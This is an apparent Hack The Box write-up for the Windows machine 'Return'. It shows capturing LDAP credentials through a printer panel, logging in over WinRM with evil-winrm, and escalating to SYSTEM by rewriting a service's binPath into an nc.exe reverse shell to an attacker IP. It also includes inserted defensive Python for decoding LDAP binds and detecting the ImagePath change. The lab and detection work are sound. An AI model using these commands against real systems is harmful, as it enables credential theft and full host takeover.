return - hack the box

We will be checking out Return, an easy-rated Windows machine on HackTheBox which was released in 2021.

https://app.hackthebox.com/machines/Return

A network printer administration panel stores LDAP credentials. These credentials can be captured by pointing the panel at a malicious LDAP server, which allows obtaining a foothold on the server through the WinRM service. The user is found to be part of a privileged group, which is further exploited to gain SYSTEM access.

Target IP: 10.129.95.241 Attacker IP: 10.10.14.92

Enumeration

nmap -sCVS 10.129.95.241

53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: HTB Printer Admin Panel
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-06 21:36:47Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-07-06T21:36:53
|_  start_date: N/A
|_clock-skew: 18m29s

From this scan we can tell that our target is a Windows Active Directory domain controller for return.local (DNS, Kerberos and LDAP are all exposed), with an IIS web server on port 80 and WinRM on port 5985.

Let's check out the HTTP web page.

HTB Printer Admin Panel


We are brought to a printer admin panel. Upon investigating the menu we find some interesting credentials in the settings.


It looks like we have some form of credentials; the server port is 389, so this is the target's LDAP service.

svc-printer credential leak

In the settings tab we are allowed to edit the server address. We put our own IP in this field and start up a listener to see what information we receive.


LDAP, by default, can use a simple bind operation for authentication, which sends the user's password in plain text over the network. In this case we are able to intercept the credentials because we were able to change the server address so that the printer's LDAP bind was sent to our listener instead of the domain controller.
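To show what the listener is actually receiving, here is an added example (not part of the original writeup) that decodes an LDAPv3 BindRequest and flags simple binds, which is the check a defender would run over a capture of TCP/389 to find accounts authenticating in cleartext. The DN return\svc-printer and the password value in the sample packet are constructed placeholders.

```python
import struct

def _tlv(data, pos):
    """Decode one BER TLV at pos -> (tag, value, next_pos); handles long-form lengths."""
    tag, length, pos = data[pos], data[pos + 1], pos + 2
    if length & 0x80:                                   # long form: n length bytes follow
        n = length & 0x7F
        length, pos = int.from_bytes(data[pos:pos + n], "big"), pos + n
    return tag, data[pos:pos + length], pos + length

def _ber(tag, value):
    """Encode one BER TLV (values up to 65535 bytes)."""
    if len(value) < 0x80:
        return bytes([tag, len(value)]) + value
    return bytes([tag, 0x82]) + struct.pack(">H", len(value)) + value

def _bind(msg_id, dn, auth):
    # LDAPMessage ::= SEQUENCE { messageID, BindRequest [APPLICATION 0] { version, name, auth } }
    body = _ber(0x02, b"\x03") + _ber(0x04, dn.encode()) + auth
    return _ber(0x30, _ber(0x02, bytes([msg_id])) + _ber(0x60, body))

def build_simple_bind(dn, password, msg_id=1):
    """Simple bind: the password rides in the request as a plain [0] OCTET STRING."""
    return _bind(msg_id, dn, _ber(0x80, password.encode()))

def build_sasl_bind(dn, mechanism, msg_id=2):
    """SASL bind: only the mechanism name travels in the BindRequest."""
    return _bind(msg_id, dn, _ber(0xA3, _ber(0x04, mechanism.encode())))

def parse_bind_request(packet):
    """Describe an LDAP BindRequest, or return None if the message is another operation."""
    tag, msg, _ = _tlv(packet, 0)
    if tag != 0x30:
        return None
    _, msg_id, pos = _tlv(msg, 0)
    tag, body, _ = _tlv(msg, pos)
    if tag != 0x60:                                     # [APPLICATION 0] = BindRequest
        return None
    _, version, pos = _tlv(body, 0)
    _, dn, pos = _tlv(body, pos)
    auth_tag, auth, _ = _tlv(body, pos)
    simple = auth_tag == 0x80
    return {"message_id": int.from_bytes(msg_id, "big"), "version": version[0],
            "dn": dn.decode(errors="replace"), "method": "simple" if simple else "sasl",
            # An empty simple credential is an anonymous bind, not a leaked password.
            "cleartext_password": simple and len(auth) > 0}

# Constructed traffic: the printer's bind as svc-printer (DN assumed; password is a placeholder).
PRINTER_BIND = build_simple_bind("return\\svc-printer", "placeholder-not-the-real-one")
```

The same bind sent over LDAPS (636) or after StartTLS is encrypted on the wire, which is the configuration fix for the printer; this decoder only applies to plaintext 389 traffic.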

Let's see if these credentials work with evil-winrm.

svc-printer:1edFg43012!!

evil-winrm -i 10.129.95.241 -u 'svc-printer' -p '1edFg43012!!'


We are in!

User Enumeration


With evil-winrm I love to use the upload feature. I'm just going to upload winPEASx64 and have it run in the background while I manually enumerate.


The Server Operators group is a built-in security group in Windows Server environments.

svc-printer is in the Server Operators group. Membership gives svc-printer enough rights to perform server administration tasks without being a full administrator.

This is a nice article I found with some possible exploits to abuse when a user is in the Server Operators group: https://www.hackingarticles.in/windows-privilege-escalation-server-operator-group/

Privilege Escalation

Let's take note of the services running on this machine:


Path                                                                                                                 Privileges Service          
----                                                                                                                 ---------- -------          
C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe                                                                  True ADWS             
\??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5533AFC7-64B3-4F6E-B453-E35320B35716}\MpKslDrv.sys       True MpKslceeb2796    
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe                                                              True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe                                                                                           True PerfHost         
"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"                                                False Sense            
C:\Windows\servicing\TrustedInstaller.exe                                                                                 False TrustedInstaller 
"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"                                                     True VGAuthService    
"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"                                                                        True VMTools          
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\NisSrv.exe"                                             True WdNisSvc         
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe"                                            True WinDefend        
"C:\Program Files\Windows Media Player\wmpnetwk.exe"                                                                      False WMPNetworkSvc

Let's try to abuse the VMTools service, since as a Server Operator we can change its configuration.

First, we upload nc.exe via evil-winrm:

upload nc.exe

Next, let's change the binary path of VMTools so that, when the service starts, it launches netcat with a shell connected back to our listener:

sc.exe config VMTools binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.92 4444"

Make sure to set up your listener on your attacking machine.


Finally, let's stop and start the VMTools service:

sc.exe stop VMTools

sc.exe start VMTools

We catch the connection on our listener and have SYSTEM access! pwned
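From the defender's side, the sc.exe config command above rewrites HKLM\SYSTEM\CurrentControlSet\Services\VMTools\ImagePath, which Sysmon records as Event ID 13 (RegistryEvent, value set). The following added example (not from the writeup) scores such events by the content of the new value; the event records are constructed here, with field names mirroring Sysmon's.

```python
import re

# Registry value holding a service's command line (Sysmon reports it as TargetObject).
SERVICE_KEY = re.compile(
    r"^HKLM\\SYSTEM\\(?:CurrentControlSet|ControlSet\d+)\\Services\\([^\\]+)\\ImagePath$",
    re.IGNORECASE)
# Roots a service binary is expected to live under; anything else is worth a look.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\",
                 "c:\\program files (x86)\\", "c:\\programdata\\microsoft\\")
# Interpreters and network tools that do not belong in a service command line.
SHELL_TOOLS = re.compile(r"\b(cmd\.exe|powershell(?:\.exe)?|nc(?:at)?\.exe)\b", re.IGNORECASE)

def split_image_path(image_path):
    """Return (executable, arguments) from a quoted or unquoted ImagePath."""
    p = image_path.strip()
    if p.startswith("\\??\\"):                         # NT path prefix used by drivers
        p = p[4:]
    if p.startswith('"'):
        exe, _, args = p[1:].partition('"')
        return exe, args.strip()
    m = re.match(r"(.+?\.(?:exe|sys))(?:\s+(.*))?$", p, re.IGNORECASE)
    return (m.group(1), m.group(2) or "") if m else (p, "")

def assess_imagepath_event(event):
    """Return (service, reasons) for a Sysmon 13 ImagePath write, or None if not one."""
    if event.get("EventID") != 13:
        return None
    m = SERVICE_KEY.match(event["TargetObject"])
    if not m:
        return None
    exe, _args = split_image_path(event["Details"])
    reasons = []
    if not exe.lower().startswith(TRUSTED_ROOTS):
        reasons.append("binary outside trusted roots: " + exe)
    hit = SHELL_TOOLS.search(event["Details"])
    if hit:
        reasons.append("shell/network tool in service command line: " + hit.group(0))
    return m.group(1), reasons

def scan(events):
    """Flagged (service, reasons) pairs; benign ImagePath writes are dropped."""
    results = (assess_imagepath_event(e) for e in events)
    return [r for r in results if r and r[1]]

# Constructed events: a routine Defender platform update and the VMTools rewrite from
# this writeup. Both writes are performed by services.exe (the SCM), so the writing
# process does not separate them; the content of the new value does.
EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\system32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\WinDefend\ImagePath",
     "Details": r'"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe"'},
    {"EventID": 13, "Image": r"C:\Windows\system32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\VMTools\ImagePath",
     "Details": r"C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.92 4444"},
]
```

Pairing the hit with the later service stop/start (System log events 7036) and with the Server Operators membership of the account that issued the change gives the full chain seen in this box.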


pwnand.win